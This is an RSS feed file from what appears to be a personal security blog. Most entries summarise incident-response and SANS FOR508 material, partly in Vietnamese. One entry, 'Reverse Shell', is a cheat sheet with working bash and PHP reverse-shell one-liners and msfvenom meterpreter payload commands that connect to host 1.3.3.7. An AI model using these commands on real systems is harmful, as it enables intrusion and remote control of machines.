-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.xml
129 lines (102 loc) · 11.5 KB
/
index.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
<?xml version="1.0" encoding="utf-8" standalone="yes" ?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>TrungKFC</title>
<link>https://vnstrawhat.github.io/</link>
<description>Recent content on TrungKFC</description>
<generator>Hugo -- gohugo.io</generator>
<language>en</language>
<lastBuildDate>Tue, 23 Jul 2019 21:32:01 +0700</lastBuildDate>
<atom:link href="https://vnstrawhat.github.io/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>FOR 508: Forensic Analysis VS Threat Hunting</title>
<link>https://vnstrawhat.github.io/posts/sans-for-508-5/</link>
<pubDate>Tue, 23 Jul 2019 21:32:01 +0700</pubDate>
<guid>https://vnstrawhat.github.io/posts/sans-for-508-5/</guid>
<description>Forensic Analysis Versus Threat Hunting Forensic Analysis Rapid Analysis &amp; Threat Hunting Don&rsquo;t Know What I&rsquo;m Looking For Know What I&rsquo;m Looking For Not accomplished on every system Touch and go scan for compromises using threat intel/indicators Helps answer key questions about breach Identify new systems compromised Key to successful remediation Meant to be able to scan 1000 of systems quickly - Collects malware - sends to RE team</description>
</item>
<item>
<title>FOR 508: Intelligence-Driven Incident Response</title>
<link>https://vnstrawhat.github.io/posts/sans-for-508-4/</link>
<pubDate>Fri, 19 Jul 2019 21:22:31 +0700</pubDate>
<guid>https://vnstrawhat.github.io/posts/sans-for-508-4/</guid>
<description>Intelligence-Driven Incident Response
Hình trên thể hiện bước identification/scoping và ước containment/intelligence development sẽ được lặp đi lặp lại trong quá trình sự cố đang xảy ra hoặc đã xảy ra. Đa số Hunting Team sẽ liên tục sử dụng các feedback từ vòng lặp trên để giúp cho việc xác định các hệ thống bị chiếm quyền điều khiển một cách nhanh nhất. Có khả năng kẻ tấn công sẽ cố gắng xâm nhập lại hệ thống của bạn một lần nữa và Team Incident Response bây giờ đã được trang bị các kiến thức phù hợp sẽ hành động nhanh hơn, chủ động hơn trong việc tìm kiếm, theo dõi các vị trí mà kẻ tấn công có khả năng xuất hiện.</description>
</item>
<item>
<title>Some work With Mcafee Endpoint Security</title>
<link>https://vnstrawhat.github.io/posts/some-work-with-mcafee-endpoint-security/</link>
<pubDate>Mon, 15 Jul 2019 09:51:20 +0700</pubDate>
<guid>https://vnstrawhat.github.io/posts/some-work-with-mcafee-endpoint-security/</guid>
<description>Some work with Expert Rules in McAfee Endpoint Security Bằng việc sử dụng Expert Rules trong policy Threat Prevention - Exploit Prevention, chúng ta có thể tạo ra một số custom rules để phục vụ cho việc giám sát một số hành vi bất thường trên endpoint.
😏 Nếu các bạn muốn sử dụng các rules này trên hệ thống Production thì nên lưu ý nên thực hiện các bước sau để nâng cao tính hiệu quả:</description>
</item>
<item>
<title>FOR 508: Hunting versus Reactive Response</title>
<link>https://vnstrawhat.github.io/posts/sans-for-508-3/</link>
<pubDate>Wed, 10 Jul 2019 21:50:51 +0700</pubDate>
<guid>https://vnstrawhat.github.io/posts/sans-for-508-3/</guid>
<description>Hunting versus Reactive Response
Hunting mà chúng ta đang nói đến là việc chủ động (Proactive) tìm kiếm những dấu hiệu của sự cố bên trong hệ thống để chủ động đưa ra các hành động ứng phó. Ngược lại với điều này là chỉ thực hiện các hành động ứng phó khi sự cố đã xảy ra (Reactive).
Reactive Response là việc thực hiện ứng phó sự cố khi có alert hoặc notification.</description>
</item>
<item>
<title>FOR 508: Active Defence</title>
<link>https://vnstrawhat.github.io/posts/sans-for-508-2/</link>
<pubDate>Wed, 03 Jul 2019 19:58:51 +0700</pubDate>
<guid>https://vnstrawhat.github.io/posts/sans-for-508-2/</guid>
<description>Containment/Intelligence Development: Active Defense Một cách thông thường, bạn có thể xác định được một sự cố đã/đang/sẽ xảy ra thông qua việc hunting và các alert từ các hệ thống ANBM. Để xác định đúng phạm vi của sự cố và duy trì được độ tin cậy của hệ thống, chúng ta cần thực hiện containment sự cố ngay khi xác định được các dấu hiệu đầu tiên.</description>
</item>
<item>
<title>FOR 508: The problem ?</title>
<link>https://vnstrawhat.github.io/posts/sans-for-508-1/</link>
<pubDate>Wed, 26 Jun 2019 19:59:27 +0700</pubDate>
<guid>https://vnstrawhat.github.io/posts/sans-for-508-1/</guid>
<description>The problem ? Imediate Eradication without proper Incident Scoping/Containment Một vấn đề thực sự là không nhiều Team Incident Response tuân theo 6 bước trong quy trình ứng phó sự cố. Các Team có xu hướng bỏ qua các bước khác và ngay lập tức đi đến bước Eradication/Remediation. Chúng ta có thể nhanh chóng đi đến bươc thực hiện remediation nhưng không phải bằng cách bỏ qua các bước quan trọng (key step) trong quy trình cũng như xem nhẹ vai trò của Cyber Threat Intelligence.</description>
</item>
<item>
<title>FOR 508: Six-Step Incident Response Process</title>
<link>https://vnstrawhat.github.io/posts/sans-for-508/</link>
<pubDate>Mon, 17 Jun 2019 21:15:32 +0700</pubDate>
<guid>https://vnstrawhat.github.io/posts/sans-for-508/</guid>
<description>Six-Step Incident Response process Ứng phó sự cố được coi như có mức độ quan trọng tương đương với việc quản lý sự cố. Thông thường, quy trình ứng phó sự cố bao gồm 6 bước chính. Tuy nhiên, việc ứng phó sự cố đòi hỏi, yêu cầu nhiều chiến thuật, quy trình linh hoạt để có thể khắc phục, ứng phó thành công đối với sự cố. Cũng nên nhớ rằng, kẻ tấn công có thể đã ở trong hệ thống của bạn hơn 1 năm hoặc lâu hơn trước khi gây ra sự cố.</description>
</item>
<item>
<title>Reverse Shell</title>
<link>https://vnstrawhat.github.io/posts/reverse_shell_all_the_think/</link>
<pubDate>Mon, 17 Jun 2019 12:02:32 +0700</pubDate>
<guid>https://vnstrawhat.github.io/posts/reverse_shell_all_the_think/</guid>
<description>Note cho khi cần dùng đến.
Reverse Shell Bash $ bash -i &gt;&amp; /dev/tcp/1.3.3.7/1234 0&gt;&amp;1 $ exec /bin/bash 0&amp;0 2&gt;&amp;0 $ msfvenom -p cmd/unix/reverse_bash LHOST=1.3.3.7 LPORT=1234 -f raw &gt; shell.sh PHP $ php -r '$sock=fsockopen(&quot;1.3.3.7&quot;,1234);exec(&quot;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);' $sock=fsockopen(&quot;1.3.3.7&quot;,1234);exec(&quot;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;); $ msfpayload php/meterpreter/reverse_tcp LHOST=1.3.3.7 LPORT=1234 R &gt; exploit.php $ msfvenom -p php/meterpreter_reverse_tcp LHOST=1.3.3.7 LPORT=1234 -f raw &gt; shell.php $ cat shell.</description>
</item>
<item>
<title>IR part 4 - Quy trình ứng phó sự cố</title>
<link>https://vnstrawhat.github.io/posts/security_incident_response_part4/</link>
<pubDate>Thu, 24 Dec 2015 11:50:39 +0700</pubDate>
<guid>https://vnstrawhat.github.io/posts/security_incident_response_part4/</guid>
<description>Quy trình ứng phó sự cố bao gồm nhiều gian đoạn. Giai đoạn đầu tiên là việc thành lập và đào tạo một đội phản ứng sự cố và lựa chọn các công cụ cũng như nguồn lực cần thiết. Trong thời gian chuẩn bị, tổ chức cũng phải hạn chế số lượng các sự cố xảy ra. Việc phát hiện các lỗ hổng bảo mật là cần thiết để cảnh báo cho các tổ chức bất kể khi nào xảy ra sự cố.</description>
</item>
<item>
<title>IR part 3 - Cơ cấu của một đội ứng phó sự cố</title>
<link>https://vnstrawhat.github.io/posts/security_incident_response_part3/</link>
<pubDate>Wed, 23 Dec 2015 11:43:38 +0700</pubDate>
<guid>https://vnstrawhat.github.io/posts/security_incident_response_part3/</guid>
<description>Một đội ứng phó sự cố nên ở trạng thái sẵn sàng trước những phát hiện hoặc nghi ngờ rằng có một sự cố về bảo mật đã xảy ra. Một hoặc nhiều thành viên trong nhóm tùy thuộc vào độ lớn của đội xử lý sự cố sẽ thực hiện xử lý sự cố. Việc xử lý sự cố bao gồm việc phân tích các dữ liệu, xác định tác động của vụ việc, các hành đồng để hạn chế thiệt hại và khôi phục lại sự hoạt động bình thường của dịch vụ.</description>
</item>
<item>
<title>IR part 2 - Chính sách, kế hoạch, thủ tục ứng phó sự cố</title>
<link>https://vnstrawhat.github.io/posts/security_incident_response_part2/</link>
<pubDate>Tue, 22 Dec 2015 11:13:11 +0700</pubDate>
<guid>https://vnstrawhat.github.io/posts/security_incident_response_part2/</guid>
<description>Chính sách Chính sách về quản lý và ứng phó sự cố của từng các nhân hay tổ chức là khác nhau. Tuy nhiên, hầy hết các chính sách đều bao gồm các yếu tố sau:
Cam kết quản lý Mục đích và mục tiêu của chính sách Phạm vi của chính sách Định nghĩa về sự cố bảo mật và các vấn đề liên quan Cơ cấu tổ chức, định nghĩa về vai trò, mức độ và quyền hạn Xếp hạng mức độ ưu tiên hoặc mức độ nghiêm trọng của sự cố Performance Measures Báo cáo và mẫu phương thức liên lạc Kế Hoạch Cá nhân hay tổ chúc cần có một kế hoạch chính thức, tập trung và phối hợp các bên liên quan để giải quyết các sự cố về bảo mật.</description>
</item>
<item>
<title>IR part 1 - Tổng quan</title>
<link>https://vnstrawhat.github.io/posts/security_incident_response_part1/</link>
<pubDate>Mon, 21 Dec 2015 14:39:53 +0700</pubDate>
<guid>https://vnstrawhat.github.io/posts/security_incident_response_part1/</guid>
<description>Sự cố an ninh là gì ? Một sự có về an ninh hay nói cách khác là sự cố về an toàn thông tin được hiểu là những vi phạm một cách rõ ràng về các chính sách an toàn thông tin, là những hành vi nhằm cố gắng đạt được những quyền truy cập trái phép, là những hành vi làm ảnh hưởng đến tính sẵn sang của hệ thống và những hành vi sửa đổi tài nguyên mà không được sự đồng ý của chủ sở hữu Sự cố về an ninh, an toàn thông tin có thể xảy ra theo nhiều cách khác nhau.</description>
</item>
</channel>
</rss>